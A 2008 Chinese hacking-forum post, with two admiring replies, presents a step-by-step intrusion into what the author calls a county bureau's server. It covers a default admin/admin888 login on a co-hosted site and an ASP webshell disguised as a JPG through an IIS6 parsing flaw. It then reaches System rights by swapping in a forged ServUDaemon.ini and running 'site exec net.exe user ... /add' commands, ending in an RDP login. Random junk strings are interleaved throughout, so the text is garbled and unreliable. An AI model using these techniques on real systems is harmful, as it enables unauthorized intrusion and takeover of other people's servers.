我爱电脑技术论坛 » 菜鸟学堂 » 拿普通服务器的一般过程。

476304467 发表于 2008-6-10 17:17

拿普通服务器的一般过程。

拿普通服务器的一般过程。简单点说，就是 弱口－－WEBSHELL－－Serv-U提权  j'j^)?.a
D

D0s(U1c| I7H
俺Q：476304467           入侵技术交流群：63374372
+IBViqK
*vx(nc\6h(kV#d Q` －－－－－－－－－－－－－－－YD的分割线－－－－－－－－－－－－－－－
_.Z-Y3pSn
Cam8{ 搞的我一朋友他们部门的服务器
S'Q:P%|ZM
8`p'ku5@.B 由于他没有告诉过我他们网站的网址，所以咱们百度搜索一下   关键字：XX县XX局
e2O4m'CDH$d
%J)l,u3g.IS([+G 处于第二位
W;k$U8L9u
~ ?E rq-P'ZK [img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245875/15245875_h.jpg[/img]
`|"MV+o~@ R5P}$I:D
打开他们的网站，一看地址，竟然只是一个介绍性质的页面：[url=http://www.xxxxx.com.cn/xxxxx/xxxxxxju/xxxx.htm][color=#0000ff]http://www.xxxxx.com.cn/xxxxx/xxxxxxju/xxxx.htm[/color][/url]
W#p7R2\:X-CX5O-d`
#i2W.w-|?v:u mr` 看来他们那破部门还真不受重视.
n qo0?+D1x9FC%Q'S![
?"bJ p
s C6N 那么找漏洞了，直接去打开主站  [url=http://www.xxx.com.cn/][color=#0000ff]www.xxx.com.cn[/color][/url]  制作的还是很
V#Y;tu\P3T&H p LzP"_9n,E~ QWL@x
不错的。
s
fx*cL4B][ fP4t*F0y
用明小子试了几个上传漏洞，管理员后台什么的，都没有
1y o0x7v[e~
I z1yFt W_#a.Iy 又翻着找了找其他什么可利用的程序，比如论坛，BLOG什么的。也没有J%QdZ4r2u3F
`%} ?JpV@"x
既然是ASP搭建的，找注入点吧。
qj-E0])NQ cosm aw+K!Bn!}
随便点开一个调用数据库的网页连接：[url=http://www.xxxx.com.cn/xxx/xxx.asp?id=5467][color=#0000ff]0w~_G} P$|%G1B,@`#d

.@J:yr%Q~RX\"WS http://www.xxxx.com.cn/xxx/xxx.asp?id=5467[/color][/url]
$P\0mpsM,S
,n2AM1h&W 先提交一个单引号，做了防注入
x0I9W%? ?uH #z0qidN~J,[Z0g `3Z
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245876/15245876_h.jpg[/img]
AYO|5YKL ydTy&HQ*^2NJ
打开啊D来用批量检测一下注入点。用啊D打开[url=http://www.g.cn/][color=#0000ff]www.g.cn[/color][/url],选择“高级搜索”G-~-S{#r[W
-r
P G Kg)Z1T.i1m
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245916/15245916_h.jpg[/img]
pO;T)ZPjZq:_q
}H3H6G.tF 然后包含字符那里写上ASP    一页显示100项    仅搜索一下网站写上想要检测的网站地址
y0AHf^X9Hr.t6d gO!l*C7sl3V2]
如图：8ag&`?,Ig3W ia%|+E

-oIyFj,R;M [img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245915/15245915_h.jpg[/img]
_#_r ^/W~d0U-I ~V-vw(T*}
得到967项符合查询的结果，啊D检测了一会儿也没见动静。咱也就这点能耐了，没辙，转旁注吧。
F)Ds6~-wZ'v(^^
*c\D"y u$O 打开这个旁注查询的网站：[url=http://www.seologs.com/ip-domains.html][color=#0000ff]http://www.seologs.com/ip-
5tj0r I8i` _4]s
[/Tnm
domains.html[/color][/url] 输入域名和随机验证码\"\J-|:Kr"j
)F!\0Y]\\ Cv
得到结果，同服务器有7个域名。其中有4个是2J域名，我想可能都是些小单位吧
/m\w)kj ?,AjH f /p$V*JT*FR!mDXt
选了个网站打开，后面加上admin/admin_login.asp，人品不错，直接管理员登录页面出现
^0oe RX%E V v3_6P"^ N+}
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245877/15245877_h.jpg[/img]
@ TY#H9q/g %_8eI
L:~$t
用大多网站默认的用户 admin 密码 admin888试下，很好，登录成功。T{]5D/Ll*[
5?:cH#]~1N5G~
C
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245879/15245879_h.jpg[/img]
6e5b1Y8~"K;`(P;i!p'\*f !H^[#{8hF0Fy
有数据库备份的功能，但是只能整站的备份，点击发表文章，插了一句话木马进行发表，然后整站备份了一下。
g$Z_c:rg2i,P
'?7b ze:q7p#h 备份成功
d6r'vg}sT W-a\Xog
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245880/15245880_h.jpg[/img]5?/{
A$f[`gm)f`

U
\4S we:NL 打开连接，提示无法显示该页mQJq#\*l [
kV"g%[WkVT
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245881/15245881_h.jpg[/img]#a6YU(u!N#R7J v
5^2GoeL
可能做了防下载处理，备份是走不通了，换思路。 @3Xv1_$C4}_
.^h:e7}7Y
随便在后台翻了翻，发现后台有修改上传文件目录的地方。
7``Zu2g&D j7}(q5Y~h
KC
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245910/15245910_h.jpg[/img].StN}pS
lZnCop N,c1y
大家都知道2003系统IIS6.0有个解析漏洞
+H+{G!|wS2l/[ r?-F`!ih
就是以ASP结尾的文件夹下的文件，在进行WEB访问时不论后缀是什么，都会被解析成ASP文件
J5~9GSQ;Vv f H lN_FD[
很好，把上传目录修改成1.ASP。
7fj m|'j$o Wk#r
s7`G n*o 打开发表文章的页面，把ASP马的后缀改成JPG。上传图片，提示格式不正确。:|8~S%sWV+kc$`*?

%j[8x P3\!Zf 应该是判断文件头的，那么咱们修改它的文件头。新建了一个JPG图片。把ASP马和JPG图片放C盘。ph.o"V.Ndn\

^e7tjd0H1Q 打开CMD，输入命令
6d2i
b&cbgS [;C?4P{"X h
cd\
8D$vv3[IDKp
z~FN*e0K1Mx FK copy 1.jpg + 1.asp 2.jpg
\auFV a"w h
(_Y Q6W1T+C
l:]:ok 这样就把1.JPG和1.ASP合并了，得到名为一个2.JPG的文件，文件头是JPG，身体是ASP马的。
w^.S^6P4v6V}Zji:S] t0TH N7z)\4o
用WEB进行ASP的解析自然是可以解析成功的。a/vrdBp

9C7_lMW dh 打开发表文章那里，点击上传图片去上传，提示上传成功。$b$Ovz2L;Q
#]/aJq-I_y0V A
得到地址：[img]http://xxxx.xxxx.com.cn/xxxxx/1.asp/200804/20080409115741788.jpg[/img]
JS1h6Dk uUb)V
LY+g%E `-r5W
F\ 直接访问，成功把JPG解析为ASP，得到webshell.
O+u?:yZ1Bs W5@1d8P3S7r&u
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245911/15245911_h.jpg[/img]W!i+}$t,}
v
|:P?.B/_V2x
因为文件头的关系，顶部会有乱码。n1?X1c9s3Y3K9tE

A8e(^H&Is{]8p5b!Y 为了美观也为了安全，在网站后台把上传文件的目录给改回去，重新传了个ASP马，把1.ASP这个文件夹以及其内的文件删除掉。"nV)jTJ.]:o4eH
JQ9K8ZE-M
打开CMD，netstat -an查看下端口开放来分析下开启的服务以及安装的第三方软件。
4vZ#D7nz-~5^!^J
W,|Q/EK
u#z 提示拒绝访问。EDCtrl
b6T |$t
W$B| TDZ
r
上传一个CMD到网站根目录，打开，选上WScript.Shell2csnw"nAv&~9K


V-s#Y-W{I$@ 执行netsta -an，看到开启了43958，43958应该是Serv-U。
j1j2g7E _&v&Nu!C 7l3x Ap+lX4Ao,E#Y
打开这个文件夹  C:\Documents and Settings\All Users\「开始」菜单\程序
J0W*mp@%`gH_)h
g'H+PtFtt2g*K'D5e 确实是安装了Serv-U E,c5iDA

4@C(S-s)\,p{ [img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245913/15245913_h.jpg[/img]l1rw)D4SV
+n(U'[ve)Q(x1S0w?
直接用大马自带的S-U提权脚本建立一个名为 laowan 的用户。CMD执行net user查看执行结果，竟然没有建立成功？
8yh[,m#@
3Jp,|#{(b 莫非是版本问题。 e%F%ez)QD|
/F.mv@Wwh
下载程序文件夹里S-U的快捷方式到本地，右键，属性，得到安装路径：  E:\Program Files\RhinoSoft.com\Serv-U
B&G)\8l)]:R%{4q ,e2K;HOs8\;M
直接跳到该目录，有一个 汉化新世纪的TXT说明文本，打开看看。^y,Lu&[#Ul

1@_FPb]0|v 赫然写着版本   ★ Serv-U FTP Server 6.4.0.5 final
J:d$A_%W#V`V#zD

me3A y&{Hq;a(B 前些日子某大牛写了个6.4的提权脚本，正好我有收藏。由于需要某些组件支持，所以成功率不高fz2kr8i
;vd]uI1J"C/co!j1]
试试吧。立马上传这个提权脚本，执行命令添加用户。net suer查看执行结果，还是没有建上。。。。&k`4e(i!IW+Bc
M7q4ev_$CS6|f
那只有试着修改 ServUDaemon.ini 添加FTP管理员登录FTP提权了。
ao:{_a^4HIa ;b@ J#NZ_$Q"m
因为权限设置不是很好，所以有修改权限，本地生成一个INI和服务器上面的进行替换，当然是先备份一下服务器上的了。做人要厚
3B+|.q$V&d[j
E%p 7u)D.["i2@7S7lx
道
Nx$_q;h%U Pf[3mQ*s.z
本地生成的INI文件：
6lG!I eic.Za 1lD$weNn
[GLOBAL]_@'Og]
Version=6.4.0.6
`z4_ P T} RegistrationKey=VTNMJPDg9iQ+NhLcbj7ucRHu5Obg6tlQtwMma3QkujNIIv5IB2M+NhLckcHscRDf5df$wO Is3V,f2t
[DOMAINS]
}:E,O!@!Kv+g Domain1=XXX.XXX.XXX.XXX||21|1|1|0|0         //服务器IP地址，端口@}D|"GvZ
[Domain1]C5HPaO:s!t-b
User1=laowan|1|0  ?5K%w#`x~;I
[USER=laowan|1]                //FTP用户名ZT$dAe-k1X0A
Password=yqBB89450768F85AF98D16C51A2965491E       //用户的密码o!m9~x!P6e;{
HomeDir=c:\             //有控制权限目录&U4}P N f
PasswordLastChange=1207022847
:b,vA:KjhG$D TimeOut=600)~xa In
Maintenance=System        //权限为system  （超级管理员）（最大权限）m5s:?M9aa2g1J
Access1=C:\|RWAMELCDP
Q/@({0VnC~%T by~R+_$N"Qm
修改成功后，直接CMD下登录FTP。f2L7cW5y.P:}%X
aG x7CZ:X6E&z
用CD命令进入systen32文件夹内，执行以下命令进行用户的添加：$\ @9J}8ee(_

] |Bu:`@,c quote site exec net.exe user laowan laowan /add,W0E1Y Sw$mf

;mj[.st4I^$u quote site exec net.exe localgroup administrators laowan /add~(h'u2k7?$@%U
'}DO.G7[ ^9M#H
这样就添加了一个用户laowan 密码laowan的系统管理员。yl:J,gkNh#R

V6Z1\!|qC 打开mstsc登录服务器，无法连接。{+{Mq*}V;[*mq3g

5a/JSR\[ J,Dp 可能是端口改了，用webshell进行服务器信息探测，得到结论，3389被改成了1901
DQ3x.^"ucS
Q9s*c*`2I)s^9}n9d [img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245934/15245934_h.jpg[/img]
%i.s _%i[@w,}6g1U9R b r'Ye Jm?!D
很好，打开mstsc，输入IP:端口进行连接。如192.167.0.1:1901进行连接，成功连接上。Kk9r}l

|9c.y#L cK.I 这里我用192.167.0.1代替
j,ue4ktT )l,wE~r8N'}
输入用户名密码，成功登录。
/BcM\{+SN $y`gOh1C
[img]http://botu.bokee.com/photodata2/2008-4-11/015/061/249/15245914/15245914_h.jpg[/img]
f4v \H9V 8y6P_Rk;X[1iS5E
至此，已经搞定这个服务器，把服务器给了我这个朋友。%wq3e3m,]
jyS:n%E[_:_LZ
最后记的把那个INI文件恢复回去

kaysnoopy 发表于 2008-6-10 17:27

:)11) 这么牛？

yanhoo 发表于 2008-6-20 23:21

太强了!佩服!

查看完整版本: 拿普通服务器的一般过程。